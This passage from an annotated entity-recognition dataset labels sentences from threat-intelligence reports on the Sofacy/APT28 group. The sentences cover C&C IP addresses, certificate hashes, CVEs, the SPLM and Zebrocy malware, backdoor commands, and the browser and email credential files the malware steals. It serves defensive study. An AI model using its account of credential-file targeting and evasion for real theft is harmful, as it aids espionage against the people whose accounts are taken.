this attribution is explained in a dedicated section below .", "spans": []} {"text": "We will refer to this IP address as Command & Control ( or C&C ) .", "spans": [{"start": 36, "end": 53, "label": "System"}, {"start": 59, "end": 62, "label": "System"}]} {"text": "If the argument -SSL is given through command-line to the artifact , these beacons will be encapsulated in an SSL connection and a proper TLS handshake will be initiated with the C&C .", "spans": [{"start": 16, "end": 20, "label": "Indicator"}, {"start": 110, "end": 113, "label": "Indicator"}, {"start": 138, "end": 141, "label": "Indicator"}, {"start": 179, "end": 182, "label": "System"}]} {"text": "Interestingly , the artifact bundles a copy of OpenSSL 1.0.1e , from February 2013 , which causes the unusually large size of the binary .", "spans": [{"start": 47, "end": 54, "label": "System"}]} {"text": "More importantly , the Command & Control server ( 176.31.112.10 ) also appears to be using an outdated version of OpenSSL and be vulnerable to Heartbleed attacks .", "spans": [{"start": 23, "end": 40, "label": "System"}, {"start": 50, "end": 63, "label": "Indicator"}, {"start": 114, "end": 121, "label": "System"}, {"start": 143, "end": 153, "label": "Vulnerability"}]} {"text": "While unlikely , it is worth considering that the same C&C server might have been the subject of 3rd-party attacks due to this vulnerability .", "spans": [{"start": 55, "end": 58, "label": "System"}]} {"text": "If connections to the C&C are blocked or terminated through a firewall , the artifact will be inhibited , as it doesn\u2019t seem to have any fallback protocol .", "spans": [{"start": 22, "end": 25, "label": "System"}]} {"text": "Additionally , since it does not execute any other functionality autonomously , it would no longer be a direct threat .", "spans": []} {"text": "While attribution of malware attacks is rarely simple or conclusive , during the course of this investigation I uncovered evidence that suggests the 
attacker might be affiliated with the state-sponsored group known as Sofacy Group ( also known as APT28 or Operation Pawn Storm ) .", "spans": [{"start": 218, "end": 224, "label": "Organization"}, {"start": 247, "end": 252, "label": "Organization"}, {"start": 256, "end": 276, "label": "Organization"}]} {"text": "Although we are unable to provide details in support of such attribution , previous work by security vendor FireEye suggests the group might be of Russian origin , however no evidence allows to tie the attacks to governments of any particular country .", "spans": [{"start": 108, "end": 115, "label": "Organization"}]} {"text": "Sofacy is a group dedicated to the compromise of high-profile targets and the theft of confidential information .", "spans": [{"start": 0, "end": 6, "label": "Organization"}]} {"text": "They appear to have been active since 2006 .", "spans": []} {"text": "They are believed to have successfully attacked the Ministries of Internal and Foreign Affairs of several ex-Soviet countries , as well as Eastern European governments and military institutions , and NATO and the White House .", "spans": [{"start": 52, "end": 74, "label": "Organization"}, {"start": 79, "end": 94, "label": "Organization"}, {"start": 200, "end": 204, "label": "Organization"}, {"start": 213, "end": 224, "label": "Organization"}]} {"text": "Sofacy is known for making extensive use of phishing attacks to lure targets into revealing their credentials via realistic reconstruction of internal systems , such as webmails , as employed against the Georgian Ministry of Internal Affairs in the infamous attacks that preceded the Georgian invasion of 2008 .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 204, "end": 241, "label": "Organization"}]} {"text": "While Sofacy is also known to use of custom exploit frameworks and spear-phishing attacks , it is possible in this case that they managed to obtain privileged credentials of network administrators within 
the Bundestag through the use of a phishing attack , which then allowed them to navigate through the network and gain access to more data .", "spans": [{"start": 6, "end": 12, "label": "Organization"}, {"start": 208, "end": 217, "label": "Organization"}]} {"text": "It is worth noting that shortly before the attack , security vendors reported the use of 0-day exploits in Flash Player and Microsoft Windows by the same threat actor .", "spans": [{"start": 89, "end": 94, "label": "Vulnerability"}, {"start": 107, "end": 119, "label": "System"}, {"start": 124, "end": 133, "label": "Organization"}, {"start": 134, "end": 141, "label": "System"}]} {"text": "During investigation of the Command & Control server ( with IP 176.31.112.10 hardcoded in Artifact #2 ) , we managed to identify some operational mistakes made by the attackers , allowing us to connect the incident with attacks previously associated with the Sofacy Group .", "spans": [{"start": 28, "end": 45, "label": "System"}, {"start": 63, "end": 76, "label": "Indicator"}, {"start": 259, "end": 265, "label": "Organization"}]} {"text": "The address , 176.31.112.10 , is a dedicated server provided by the French OVH hosting company , but is apparently operated by an offshore secure hosting company called CrookServers.com .", "spans": [{"start": 14, "end": 27, "label": "Indicator"}, {"start": 75, "end": 78, "label": "System"}, {"start": 169, "end": 185, "label": "Organization"}]} {"text": "By researching historical data relevant to C&C 176.31.112.10 , we discovered that on February 16th 2015 , the server was sharing an SSL certificate with another IP address allocated to CrookServers and also hosted at OVH : 213.251.187.145 .", "spans": [{"start": 43, "end": 46, "label": "System"}, {"start": 47, "end": 60, "label": "Indicator"}, {"start": 132, "end": 135, "label": "Indicator"}, {"start": 185, "end": 197, "label": "Organization"}, {"start": 217, "end": 220, "label": "System"}, {"start": 223, "end": 238, "label": 
"Indicator"}]} {"text": "The recovered shared SSL certificate , obtained by a public internet-wide scanning initiative , at the time had the following attributes :", "spans": [{"start": 21, "end": 24, "label": "Indicator"}]} {"text": "MD5 b84b66bcdecd4b4529014619ed649d76 SHA1 fef1725ad72e4ef0432f8cb0cb73bf7ead339a7c Algorithm sha1 With RSA Encryption .", "spans": [{"start": 4, "end": 36, "label": "Indicator"}, {"start": 42, "end": 82, "label": "Indicator"}]} {"text": "As shown , the certificate uses mail.mfa.gov.ua as a Common Name .", "spans": [{"start": 32, "end": 47, "label": "Indicator"}]} {"text": "This suggests that this certificate might have been previously used for a similar attack against the Ukrainian Ministry of Foreign Affairs , or associated targets , although there is no documentation of such attack available to the public .", "spans": [{"start": 101, "end": 138, "label": "Organization"}]} {"text": "More importantly , the IP address this certificate was shared with 213.251.187.145 was previously identified as used by Sofacy Group for phishing attacks against Albanian government institutions by registering the domain qov.al and creating realistic subdomains to lure victims into visiting .", "spans": [{"start": 67, "end": 82, "label": "Indicator"}, {"start": 120, "end": 126, "label": "Organization"}, {"start": 221, "end": 227, "label": "Indicator"}]} {"text": "The domain was active on the IP 213.251.187.145 from July 2014 up until March 2015 .", "spans": [{"start": 32, "end": 47, "label": "Indicator"}]} {"text": "These attacks against Albanian government institutions by the Sofacy Group were documented and reported by consultancy corporate PwC in December 2014 .", "spans": [{"start": 62, "end": 68, "label": "Organization"}, {"start": 129, "end": 132, "label": "Organization"}]} {"text": "It is worth noting that this server also seems to be operated by CrookServers , since among other domains , 454-reverse.crookservers.net resolved to the same IP address 
.", "spans": [{"start": 65, "end": 77, "label": "Organization"}, {"start": 108, "end": 136, "label": "Indicator"}]} {"text": "While the evidence presented strongly suggests a connection with the Sofacy Group , the artifacts ( in particular Artifact #2 ) are not publicly recognized to be part of the more traditional arsenal of these attackers .", "spans": [{"start": 69, "end": 75, "label": "Organization"}]} {"text": "Nevertheless , on May 12th 2015 ( a few weeks after the attack against Bundestag appears to have started ) the American security firm root9B released a report containing details on malware samples very similar to Artifact #2 .", "spans": [{"start": 71, "end": 80, "label": "Organization"}]} {"text": "The report also includes a mention of the same IP address used as Command & Control server in the attack against Bundestag ( 176.31.112.10 ) .", "spans": [{"start": 66, "end": 83, "label": "System"}, {"start": 113, "end": 122, "label": "Organization"}, {"start": 125, "end": 138, "label": "Indicator"}]} {"text": "While the report appears to contain numerous inaccuracies , some of the indicators of compromises are legitimate and appear to be correctly attributed to Sofacy .", "spans": [{"start": 154, "end": 160, "label": "Organization"}]} {"text": "A Slice of 2017 Sofacy Activity .", "spans": [{"start": 16, "end": 22, "label": "Organization"}]} {"text": "Sofacy , also known as APT28 , Fancy Bear , and Tsar Team , is a highly active and prolific APT .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 23, "end": 28, "label": "Organization"}, {"start": 31, "end": 41, "label": "Organization"}, {"start": 48, "end": 57, "label": "Organization"}]} {"text": "From their high volume 0day deployment to their innovative and broad malware set , Sofacy is one of the top groups that we monitor , report , and protect against . 
2017 was not any different in this regard .", "spans": [{"start": 23, "end": 27, "label": "Vulnerability"}, {"start": 83, "end": 89, "label": "Organization"}]} {"text": "Our private reports subscription customers receive a steady stream of YARA , IOC , and reports on Sofacy , our most reported APT for the year .", "spans": [{"start": 70, "end": 74, "label": "System"}, {"start": 77, "end": 80, "label": "System"}, {"start": 98, "end": 104, "label": "Organization"}]} {"text": "This high level of cyber-espionage activity goes back years .", "spans": []} {"text": "In 2011-2012 , the group used a relatively tiny implant ( known as \u201c Sofacy \u201d or SOURFACE ) as their first stage malware , which at the time had similarities with the old Miniduke implants .", "spans": [{"start": 69, "end": 75, "label": "Organization"}, {"start": 81, "end": 89, "label": "Organization"}]} {"text": "This made us believe the two groups were connected , although it looks they split ways at a certain point , with the original Miniduke group switching to the CosmicDuke implant in 2014 .", "spans": [{"start": 126, "end": 134, "label": "Organization"}, {"start": 158, "end": 168, "label": "Malware"}]} {"text": "The division in malware was consistent and definitive at that point .", "spans": []} {"text": "In 2013 , the Sofacy group expanded their arsenal and added more backdoors and tools , including CORESHELL , SPLM ( aka Xagent , aka CHOPSTICK ) , JHUHUGIT ( which is built with code from the Carberp sources ) , AZZY ( aka ADVSTORESHELL , NETUI , EVILTOSS , and spans across 4-5 generations ) and a few others .", "spans": [{"start": 14, "end": 20, "label": "Organization"}, {"start": 97, "end": 106, "label": "Malware"}, {"start": 109, "end": 113, "label": "Malware"}, {"start": 120, "end": 126, "label": "Malware"}, {"start": 133, "end": 142, "label": "Malware"}, {"start": 147, "end": 155, "label": "Malware"}, {"start": 192, "end": 199, "label": "Malware"}, {"start": 212, "end": 216, "label": 
"Malware"}, {"start": 223, "end": 236, "label": "Malware"}, {"start": 239, "end": 244, "label": "Malware"}, {"start": 247, "end": 255, "label": "Malware"}]} {"text": "We \u2019ve seen quite a few versions of these implants , which were relatively widespread at some point or still are .", "spans": []} {"text": "In 2015 we noticed another wave of attacks which took advantage of a new release of the AZZY implant , largely undetected by antivirus products .", "spans": [{"start": 88, "end": 92, "label": "Malware"}]} {"text": "The new wave of attacks included a new generation of USB stealers deployed by Sofacy , with initial versions dating to February 2015 .", "spans": [{"start": 53, "end": 65, "label": "Malware"}, {"start": 78, "end": 84, "label": "Organization"}]} {"text": "It appeared to be geared exclusively towards high profile targets .", "spans": []} {"text": "Sofacy \u2019s reported presence in the DNC network alongside APT29 brought possibly the highest level of public attention to the group \u2019s activities in 2016 , especially when data from the compromise was leaked and \u201c weaponized \u201d .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 35, "end": 38, "label": "System"}, {"start": 57, "end": 62, "label": "Organization"}]} {"text": "And later 2016 , their focus turned towards the Olympics \u2019 and the World Anti-Doping Agency ( WADA ) and Court of Arbitration for Sports ( CAS ) , when individuals and servers in these organizations were phished and compromised .", "spans": [{"start": 48, "end": 56, "label": "Organization"}, {"start": 67, "end": 91, "label": "Organization"}, {"start": 94, "end": 98, "label": "Organization"}, {"start": 105, "end": 136, "label": "Organization"}, {"start": 139, "end": 142, "label": "Organization"}]} {"text": "In a similar vein with past CyberBerkut activity , attackers hid behind anonymous activist groups like \u201c anonpoland \u201d , and data from victimized organizations were similarly leaked 
and \u201c weaponized \u201d .", "spans": []} {"text": "This write-up will survey notables in the past year of 2017 Sofacy activity , including their targeting , technology , and notes on their infrastructure .", "spans": [{"start": 60, "end": 66, "label": "Organization"}]} {"text": "No one research group has 100% global visibility , and our collected data is presented accordingly .", "spans": []} {"text": "Here , external APT28 reports on 2017 Darkhotel-style activity in Europe and Dealer \u2019s Choice spearphishing are of interest .", "spans": [{"start": 16, "end": 21, "label": "Organization"}]} {"text": "From where we sit , 2017 Sofacy activity starts with a heavy focus on NATO and Ukrainian partners , coinciding with lighter interest in Central Asian targets , and finishing the second half of the year with a heavy focus on Central Asian targets and some shift further East .", "spans": [{"start": 25, "end": 31, "label": "Organization"}, {"start": 70, "end": 74, "label": "Organization"}]} {"text": "Sofacy kicked off the year deploying two 0day in a spearphish document , both a Microsoft Office encapsulated postscript type confusion exploit ( abusing CVE-2017-0262 ) and an escalation of privilege use-after-free exploit ( abusing CVE-2017-0263 ) .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 41, "end": 45, "label": "Vulnerability"}, {"start": 80, "end": 89, "label": "Organization"}, {"start": 90, "end": 96, "label": "System"}, {"start": 154, "end": 167, "label": "Vulnerability"}, {"start": 234, "end": 247, "label": "Vulnerability"}]} {"text": "The group attempted to deploy this spearphish attachment to push a small 30kb backdoor known as GAMEFISH to targets in Europe at the beginning of 2017 .", "spans": [{"start": 96, "end": 104, "label": "Malware"}]} {"text": "They took advantage of the Syrian military conflict for thematic content and file naming \u201c Trump \u2019s_Attack_on_Syria_English.docx \u201d .", "spans": [{"start": 91, 
"end": 128, "label": "Indicator"}]} {"text": "Again , this deployment was likely a part of their focus on NATO targets .", "spans": [{"start": 60, "end": 64, "label": "Organization"}]} {"text": "Meanwhile in early-to-mid 2017 , SPLM / CHOPSTICK / XAgent detections in Central Asia provided a glimpse into ongoing focus on ex-Soviet republics in Central Asia .", "spans": [{"start": 33, "end": 37, "label": "Malware"}, {"start": 40, "end": 49, "label": "Malware"}, {"start": 52, "end": 58, "label": "Malware"}]} {"text": "These particular detections are interesting because they indicate an attempted selective 2nd stage deployment of a backdoor maintaining filestealer , keylogger , and remoteshell functionality to a system of interest .", "spans": []} {"text": "As the latest revision of the backdoor , portions of SPLM didn\u2019t match previous reports on SPLM / XAgent while other similarities were maintained .", "spans": [{"start": 53, "end": 57, "label": "Malware"}, {"start": 91, "end": 95, "label": "Malware"}, {"start": 98, "end": 104, "label": "Malware"}]} {"text": "SPLM 64-bit modules already appeared to be at version 4 of the software by May of the year .", "spans": [{"start": 0, "end": 4, "label": "Malware"}]} {"text": "Targeting profiles included defense related commercial and military organizations , and telecommunications .", "spans": []} {"text": "Since mid-November 2015 , the threat actor referred to as \u201c Sofacy \u201d or \u201c APT28 \u201d has been utilizing a unique payload and delivery mechanism written in Delphi and AutoIT .", "spans": [{"start": 60, "end": 66, "label": "Organization"}, {"start": 74, "end": 79, "label": "Organization"}, {"start": 152, "end": 158, "label": "System"}, {"start": 163, "end": 169, "label": "System"}]} {"text": "We collectively refer to this package and related activity as \u201c Zebrocy \u201d and had written a few reports on its usage and development by June 2017 \u2013 Sofacy developers modified and redeployed 
incremented versions of the malware .", "spans": [{"start": 64, "end": 71, "label": "Malware"}, {"start": 148, "end": 154, "label": "Organization"}]} {"text": "The Zebrocy chain follows a pattern : spearphish attachment -> compiled Autoit script ( downloader ) -> Zebrocy payload .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 72, "end": 78, "label": "System"}, {"start": 104, "end": 111, "label": "Malware"}]} {"text": "In some deployments , we observed Sofacy actively developing and deploying a new package to a much smaller , specific subset of targets within the broader set .", "spans": [{"start": 34, "end": 40, "label": "Organization"}]} {"text": "Targeting profiles , spearphish filenames , and lures carry thematic content related to visa applications and scanned images , border control administration , and various administrative notes .", "spans": []} {"text": "Targeting appears to be widely spread across the Middle East , Europe , and Asia .", "spans": []} {"text": "We identified new MSIL components deployed by Zebrocy .", "spans": [{"start": 18, "end": 22, "label": "System"}, {"start": 46, "end": 53, "label": "Malware"}]} {"text": "While recent Zebrocy versioning was 7.1 , some of the related Zebrocy modules that drop file-stealing MSIL modules we call Covfacy were v7.0 .", "spans": [{"start": 13, "end": 20, "label": "Malware"}, {"start": 62, "end": 69, "label": "Malware"}, {"start": 102, "end": 106, "label": "System"}, {"start": 123, "end": 130, "label": "System"}]} {"text": "The components were an unexpected inclusion in this particular toolset .", "spans": []} {"text": "For example , one sent out to a handful of countries identifies network drives when they are added to target systems , and then RC4 like-encrypts and writes certain file metadata and contents to a local path for later Exfiltration .", "spans": []} {"text": "The stealer searches for files 60mb and less with these extensions : .doc , .docx , .xls , .xlsx , .ppt , .pptx , 
.exe , .zip , .rar .", "spans": [{"start": 69, "end": 73, "label": "Indicator"}, {"start": 76, "end": 81, "label": "Indicator"}, {"start": 84, "end": 88, "label": "Indicator"}, {"start": 91, "end": 96, "label": "Indicator"}, {"start": 99, "end": 103, "label": "Indicator"}, {"start": 106, "end": 111, "label": "Indicator"}, {"start": 114, "end": 118, "label": "Indicator"}, {"start": 121, "end": 125, "label": "Indicator"}, {"start": 128, "end": 132, "label": "Indicator"}]} {"text": "At execution , it installs an application-defined Windows hook .", "spans": [{"start": 50, "end": 57, "label": "System"}]} {"text": "The hook gets windows messages indicating when a network drive has been attached .", "spans": [{"start": 14, "end": 21, "label": "System"}]} {"text": "Upon adding a network drive , the hook calls its \u201c RecordToFile \u201d file stealer method .", "spans": []} {"text": "SPLM / CHOPSTICK components deployed throughout 2017 were native 64-bit modular C++ Windows COM backdoors supporting http over fully encrypted TLSv1 and TLSv1.2 communications , mostly deployed in the second half of 2017 by Sofacy .", "spans": [{"start": 0, "end": 4, "label": "Malware"}, {"start": 7, "end": 16, "label": "Malware"}, {"start": 80, "end": 83, "label": "System"}, {"start": 84, "end": 91, "label": "System"}, {"start": 92, "end": 95, "label": "System"}, {"start": 117, "end": 121, "label": "Indicator"}, {"start": 143, "end": 148, "label": "Indicator"}, {"start": 153, "end": 160, "label": "Indicator"}, {"start": 224, "end": 230, "label": "Organization"}]} {"text": "Earlier SPLM activity deployed 32-bit modules over unencrypted http ( and sometimes smtp ) sessions .", "spans": [{"start": 8, "end": 12, "label": "Malware"}, {"start": 63, "end": 67, "label": "Indicator"}, {"start": 84, "end": 88, "label": "Indicator"}]} {"text": "In 2016 we saw fully functional , very large SPLM / X-Agent modules supporting OS X .", "spans": [{"start": 45, "end": 49, "label": "Malware"}, {"start": 52, 
"end": 59, "label": "Malware"}, {"start": 79, "end": 83, "label": "System"}]} {"text": "The executable module continues to be part of a framework supporting various internal and external components communicating over internal and external channels , maintaining slightly morphed encryption and functionality per deployment .", "spans": []} {"text": "Sofacy selectively used SPLM / CHOPSTICK modules as second stage implants to high interest targets for years now .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 24, "end": 28, "label": "Malware"}, {"start": 31, "end": 40, "label": "Malware"}]} {"text": "The newer SPLM modules are deployed mostly to Central Asian based targets that may have a tie to NATO in some form .", "spans": [{"start": 10, "end": 14, "label": "Malware"}, {"start": 97, "end": 101, "label": "Organization"}]} {"text": "These targets include foreign affairs government organizations both localized and abroad , and defense organizations \u2019 presence localized , located in Europe and also located in Afghanistan .", "spans": []} {"text": "One outlier SPLM target profile within our visibility includes an audit and consulting firm in Bosnia and Herzegovina .", "spans": [{"start": 12, "end": 16, "label": "Malware"}]} {"text": "Minor changes and updates to the code were released with these deployments , including a new mutex format and the exclusive use of encrypted HTTP communications over TLS .", "spans": [{"start": 141, "end": 145, "label": "Indicator"}, {"start": 166, "end": 169, "label": "Indicator"}]} {"text": "The compiled code itself already is altered per deployment in multiple subtle ways , in order to stymie identification and automated analysis and accommodate targeted environments .", "spans": []} {"text": "Strings ( c2 domains and functionality , error messages , etc ) are custom encrypted per deployment .", "spans": [{"start": 10, "end": 12, "label": "System"}]} {"text": "This subset of SPLM / CHOPSTICK activity leads 
into several small surprises that take us into 2018 , to be discussed in further detail at SAS 2018 .", "spans": [{"start": 15, "end": 19, "label": "Malware"}, {"start": 22, "end": 31, "label": "Malware"}, {"start": 138, "end": 141, "label": "Organization"}]} {"text": "The group demonstrates malleability and innovation in maintaining and producing familiar SPLM functionality , but the pragmatic and systematic approach towards producing undetected or difficult-to-detect malware continues .", "spans": [{"start": 89, "end": 93, "label": "Malware"}]} {"text": "Changes in the second stage SPLM backdoor are refined , making the code reliably modular .", "spans": [{"start": 28, "end": 41, "label": "Malware"}]} {"text": "It \u2019s interesting to note that this version of SPLM implements communications that are fully encrypted over HTTPS .", "spans": [{"start": 47, "end": 51, "label": "Malware"}, {"start": 108, "end": 113, "label": "Indicator"}]} {"text": "As an example , we might see extraneous data in their SSL / TLS certificates that give away information about their provider or resources .", "spans": [{"start": 54, "end": 57, "label": "Indicator"}, {"start": 60, "end": 63, "label": "Indicator"}]} {"text": "Leading up to summer 2017 , infrastructure mostly was created with PDR and Internet Domain Service BS Corp , and their resellers .", "spans": []} {"text": "Hosting mostly was provided at Fast Serv Inc and resellers , in all likelihood related to bitcoin payment processing .", "spans": []} {"text": "Accordingly , the server side certificates appear to be generated locally on VPS hosts that exclusively are paid for at providers with bitcoin merchant processing .", "spans": [{"start": 77, "end": 80, "label": "System"}]} {"text": "One certificate was generated locally on what appeared to be a HP-UX box , and another was generated on 8569985.securefastserver.com with an email address root@8569985.securefastserver.com , as seen here for their nethostnet.com domain .", 
"spans": [{"start": 63, "end": 68, "label": "System"}, {"start": 104, "end": 132, "label": "Indicator"}, {"start": 141, "end": 146, "label": "System"}, {"start": 155, "end": 188, "label": "Indicator"}, {"start": 214, "end": 228, "label": "Indicator"}]} {"text": "This certificate configuration is ignored by the malware .", "spans": []} {"text": "Sofacy , one of the most active APT we monitor , continues to spearphish their way into targets , reportedly widely phishes for credentials , and infrequently participates in server side activity ( including host compromise with BeEF deployment , for example ) .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 229, "end": 233, "label": "System"}]} {"text": "KSN visibility and detections suggests a shift from their early 2017 high volume NATO spearphish targeting towards the middle east and Central Asia , and finally moving their focus further east into late 2017 .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 81, "end": 85, "label": "Organization"}]} {"text": "Their operational security is good .", "spans": []} {"text": "Their campaigns appear to have broken out into subsets of activity and malware involving GAMEFISH , Zebrocy , and SPLM , to name a few .", "spans": [{"start": 89, "end": 97, "label": "Malware"}, {"start": 100, "end": 107, "label": "Malware"}, {"start": 114, "end": 118, "label": "Malware"}]} {"text": "Their evolving and modified SPLM / CHOPSTICK / XAgent code is a long-standing part of Sofacy activity , however much of it is changing .", "spans": [{"start": 28, "end": 32, "label": "Malware"}, {"start": 35, "end": 44, "label": "Malware"}, {"start": 47, "end": 53, "label": "Malware"}, {"start": 86, "end": 92, "label": "Organization"}]} {"text": "We \u2019ll cover more recent 2018 change in their targeting and the malware itself at SAS 2018 .", "spans": [{"start": 82, "end": 85, "label": "Organization"}]} {"text": "A journey to Zebrocy land .", "spans": [{"start": 
13, "end": 20, "label": "Malware"}]} {"text": "The Sednit group \u2013 also known as APT28 , Fancy Bear , Sofacy or STRONTIUM \u2013 has been operating since at least 2004 and has made headlines frequently in past years .", "spans": [{"start": 4, "end": 10, "label": "Organization"}, {"start": 33, "end": 38, "label": "Organization"}, {"start": 41, "end": 51, "label": "Organization"}, {"start": 54, "end": 60, "label": "Organization"}, {"start": 64, "end": 73, "label": "Organization"}]} {"text": "Recently , we unveiled the existence of a UEFI rootkit , called LoJax , which we attribute to the Sednit group .", "spans": [{"start": 42, "end": 46, "label": "System"}, {"start": 64, "end": 69, "label": "Malware"}, {"start": 98, "end": 104, "label": "Organization"}]} {"text": "This is a first for an APT group , and shows Sednit has access to very sophisticated tools to conduct its espionage operations .", "spans": [{"start": 45, "end": 51, "label": "Organization"}]} {"text": "Three years ago , the Sednit group unleashed new components targeting victims in various countries in the Middle East and Central Asia .", "spans": [{"start": 22, "end": 28, "label": "Organization"}]} {"text": "Since then , the number and diversity of components has increased drastically .", "spans": []} {"text": "ESET researchers and colleagues from other companies have documented these components ; however , in this article we will focus on what \u2019s beyond the compromise , what the operators do once a victim system is running a Zebrocy Delphi backdoor .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 219, "end": 226, "label": "Malware"}, {"start": 227, "end": 233, "label": "System"}]} {"text": "At the end of August 2018 , the Sednit group launched a spearphishing email campaign where it distributed shortened URLs that delivered the first stage of Zebrocy components .", "spans": [{"start": 32, "end": 38, "label": "Organization"}, {"start": 70, "end": 75, "label": "System"}, 
{"start": 155, "end": 162, "label": "Malware"}]} {"text": "In the past , Sednit used a similar technique for credential phishing .", "spans": [{"start": 14, "end": 20, "label": "Organization"}]} {"text": "However , it is unusual for the group to use this technique to deliver one of its malware components directly .", "spans": []} {"text": "Previously , it had used exploits to deliver and execute the first stage malware , while in this campaign the group relied entirely on social engineering to lure victims into running the first part of the chain .", "spans": []} {"text": "The screenshot in Figure 1 shows Bitly statistics for the shortened URL used in this campaign .", "spans": [{"start": 33, "end": 38, "label": "System"}]} {"text": "While ESET telemetry data indicates that this URL was delivered by spearphishing emails , we don\u2019t have a sample of such an email .", "spans": [{"start": 6, "end": 10, "label": "Organization"}, {"start": 81, "end": 87, "label": "System"}, {"start": 124, "end": 129, "label": "System"}]} {"text": "The shortened URL leads the victim to an IP-address-based URL , where the archived payload is located .", "spans": []} {"text": "Unfortunately , without the email message , we don\u2019t know if there are any instructions for the user , if there is any further social engineering , or if it relies solely on the victim \u2019s curiosity .", "spans": [{"start": 28, "end": 33, "label": "System"}]} {"text": "The archive contains two files ; the first is an executable file , while the second is a decoy PDF document .", "spans": [{"start": 95, "end": 98, "label": "System"}]} {"text": "Note there is a typo in the executable \u2019s filename ; Once the binary is executed , a password prompt dialog box opens .", "spans": []} {"text": "The result of the password validation will always be wrong , but after the apparent validation attempt , the decoy PDF document is opened .", "spans": [{"start": 115, "end": 118, "label": "System"}]} {"text": "That 
document appears to be empty , but the downloader , which is written in Delphi , continues running in the background .", "spans": [{"start": 77, "end": 83, "label": "System"}]} {"text": "The IP address is also used in the URL hardcoded into the first binary downloader .", "spans": []} {"text": "The Stage-1 downloader will download and execute a new downloader , written in C++ , not so different from other Zebrocy downloaders .", "spans": [{"start": 79, "end": 82, "label": "System"}, {"start": 113, "end": 120, "label": "Malware"}]} {"text": "Once again this downloader is as straightforward as the Zebrocy gang \u2019s other downloaders .", "spans": [{"start": 56, "end": 63, "label": "Malware"}]} {"text": "It creates an ID and it downloads a new , interesting backdoor , ( this time ) written in Delphi .", "spans": [{"start": 90, "end": 96, "label": "System"}]} {"text": "As we explained in our most recent blogpost about Zebrocy , the configuration of the backdoor is stored in the resource section and is split into four different hex-encoded , encrypted blobs .", "spans": [{"start": 50, "end": 57, "label": "Malware"}]} {"text": "These blobs contain the different parts of the configuration .", "spans": []} {"text": "Once the backdoor sends basic information about its newly compromised system , the operators take control of the backdoor and start to send commands right away .", "spans": []} {"text": "Hence , the time between the victim running the downloader and the operators \u2019 first commands is only a few minutes .", "spans": []} {"text": "In this section we describe in more detail the commands performed manually by the operators through their Delphi backdoor .", "spans": [{"start": 106, "end": 112, "label": "System"}]} {"text": "The commands available are located in one of the configuration blobs mentioned earlier .", "spans": []} {"text": "The number of supported commands has increased over time , with the latest version of the backdoor having more than thirty 
.", "spans": []} {"text": "As we did not identify a pattern in the order which the commands are invoked , we believe the operators are executing them manually .", "spans": []} {"text": "The first set of commands gathers information about the victim \u2019s computer and environment :", "spans": []} {"text": "Commands Arguments SCREENSHOT None SYS_INFO None GET_NETWORK None SCAN_ALL None .", "spans": []} {"text": "The commands above are commonly executed when the operators first connect to a newly activated backdoor .", "spans": []} {"text": "They don\u2019t have any arguments , and they are quite self-explanatory .", "spans": []} {"text": "Other commands commonly seen executed shortly after these backdoors are activated .", "spans": []} {"text": "Those who already have read our previous articles about Zebrocy will notice that more or less the same kind of information is sent , over and over again by previous stages .", "spans": [{"start": 56, "end": 63, "label": "Malware"}]} {"text": "This information is requested within a few minutes of initial compromise and the amount of data the operator will have to deal with is quite considerable .", "spans": []} {"text": "In order to collect even more information , from time to time the Zebrocy operators upload and use dumpers on victims \u2019 machines .", "spans": [{"start": 66, "end": 73, "label": "Malware"}]} {"text": "The current dumpers have some similarities with those previously used by the group .", "spans": []} {"text": "In this case , Yandex Browser , Chromium , 7Star Browser ( a Chromium-based browser ) , and CentBrowser are targeted , as well as versions of Microsoft Outlook from 1997 through 2016 .", "spans": [{"start": 15, "end": 29, "label": "System"}, {"start": 32, "end": 40, "label": "System"}, {"start": 43, "end": 56, "label": "System"}, {"start": 61, "end": 83, "label": "System"}, {"start": 92, "end": 103, "label": "System"}, {"start": 142, "end": 151, "label": "Organization"}, {"start": 152, "end": 159, 
"label": "System"}]} {"text": "These dumpers create log files indicating the presence or absence of potential databases to dump :", "spans": []} {"text": "Command Arguments DOWNLOAD_LIST C:\\ProgramData\\Office\\MS\\out.txt , C:\\ProgramData\\Office\\MS\\text.txt .", "spans": [{"start": 32, "end": 64, "label": "Indicator"}, {"start": 67, "end": 100, "label": "Indicator"}]} {"text": "These dumpers are quickly removed once they have done their job .", "spans": []} {"text": "Moreover , the backdoor contains a list of filenames related to credentials from software listed below ( database names ) :", "spans": []} {"text": "key3.db Firefox private keys ( now named key4.db ) cert8.db Firefox certificate database logins.json Firefox encrypted password database account.cfn The Bat ! ( email client ) account credentials wand.dat Opera password database .", "spans": [{"start": 0, "end": 7, "label": "Indicator"}, {"start": 8, "end": 15, "label": "System"}, {"start": 41, "end": 48, "label": "Indicator"}, {"start": 51, "end": 59, "label": "Indicator"}, {"start": 60, "end": 67, "label": "System"}, {"start": 89, "end": 100, "label": "Indicator"}, {"start": 101, "end": 108, "label": "System"}, {"start": 137, "end": 148, "label": "Indicator"}, {"start": 161, "end": 166, "label": "System"}, {"start": 196, "end": 204, "label": "Indicator"}, {"start": 205, "end": 210, "label": "System"}]} {"text": "The operators retrieve these files on the machine using the DOWNLOAD_LIST command .", "spans": []} {"text": "This command can be used when the operators are aware of the presence of interesting files on the computer .", "spans": []} {"text": "Finally , depending on how interesting the victim is , the malware operators may deploy another custom backdoor .", "spans": []} {"text": "This backdoor is executed using the CMD_EXECUTE command .", "spans": []} {"text": "There are some interesting facts here .", "spans": []} {"text": "First , they use COM object hijacking to make the malware 
